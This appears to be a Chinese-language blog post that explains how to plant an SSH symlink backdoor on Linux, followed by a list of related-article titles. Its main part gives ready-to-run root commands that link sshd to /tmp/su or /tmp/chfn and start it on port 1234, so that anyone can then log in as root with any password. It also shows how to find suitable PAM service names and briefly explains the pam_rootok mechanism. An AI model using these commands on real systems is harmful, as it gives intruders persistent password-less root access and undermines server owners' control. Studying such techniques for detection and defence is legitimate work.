SSH軟連結後門利用和原理
00
利用前提
ssh配置中開啟了PAM進行身份驗證
檢視是否使用PAM進行身份驗證:cat/etc/ssh/sshd_config|grep UsePAM
01
建立後門
建立軟連線後門:ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=1234
注意:軟連結的路徑不是絕對的,但名字不是隨便命名的,使用命令find/etc/pam.d|xargs grep "pam_rootok",出現的則可以用作軟連結名稱
# find /etc/pam.d |xargs grep "pam_rootok" 123
grep: /etc/pam.d: 是一個目錄
/etc/pam.d/su:auth sufficient pam_rootok.so
/etc/pam.d/su:# permitted earlier by e.g. "sufficient pam_rootok.so").
/etc/pam.d/runuser:auth sufficient pam_rootok.so
/etc/pam.d/chsh:auth sufficient pam_rootok.so
/etc/pam.d/chfn:auth sufficient pam_rootok.so
測試
使用root執行命令
# ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=1234
然後使用ssh任意密碼連線1234埠登入root賬戶02
原理
pam_rootok.so模組
pam_rootok.so主要作用是使得uid為0的使用者,即root使用者可以直接透過認證而不需要輸入密碼。
我們檢視/etc/pam.d/su 檔案中,我們可以看到使用了該模組,這也是為什麼root使用者切換至普通使用者不需要密碼的原因。
1.PAM認證機制,若sshd服務中開啟了PAM認證機制(預設開啟),當程式執行時,PAM模組則會搜尋PAM相關設定檔案,設定檔案一般是在/etc/pam.d/。若關閉則會驗證密碼,無法建立軟連結後門。
2.當我們透過特定的埠連線ssh後,應用在啟動過程中就會去找到配置檔案,如:我們的軟連結檔案為/tmp/su,那麼應用就會找/etc/pam.d/su作為配置檔案,那麼則實現了無密登入。
相關文章
- SSH後門分析總結
- Linux軟連結和硬連結Linux
- 軟連結和硬連結詳解
- linux硬連結和軟連結Linux
- Raspbian首次安裝後無法使用SSH連結
- “軟連結”和“硬連結”的區別
- Linux(8) —— 硬連結和軟連結Linux
- 硬連結和軟連結的區別
- Linux 軟連結和硬連結簡介Linux
- Linux精講——軟連結和硬連結Linux
- 深入理解硬連結和軟連結 (轉)
- Linux軟連線和硬連結Linux
- 知名軟體被利用,小心主機被開後門
- Linux硬連結和軟連線有哪些知識點?Linux入門Linux
- Github配置ssh連結win、macGithubMac
- 程式的編譯和連結原理分析編譯
- 如何利用SSH通道來連線遠端的MysqlMySql
- 軟連線、硬連結 和 i節點(inode)
- 簡談linux中軟連結和硬連結的區別Linux
- 【linux命令之ln命令詳解(軟連結和硬連結)】Linux
- --SSH 擁有777許可權,和SSH連上主機,登入後自動斷開連線的問題。
- 5分鐘讓你明白“軟連結”和“硬連結”的區別
- 5 分鐘讓你明白 “軟連結” 和“硬連結”的區別
- 伺服器SSH後門木馬查殺伺服器
- 硬連結與軟連結詳解
- 連結串列入門與插入連結串列
- Linux中軟連結和硬連結之間有什麼區別和聯絡?Linux
- SSH安全性和配置入門
- 軟連結與硬連結的區別
- linux下軟連結與硬連結Linux
- Linux 硬連結與軟連結(zt)Linux
- 軟連線與硬連結的區別,以及如何刪除軟連結
- 軟連結刪除
- Mac 系統如何利用軟連結在根目錄建立資料夾?Mac
- Linux下的軟連結和硬連結,檔案拷貝的區別Linux
- SSH連線伺服器後執行多條命令伺服器
- 解決ssh連線CentOS後中文顯示亂碼CentOS
- 理解 Linux 的硬連結與軟連結Linux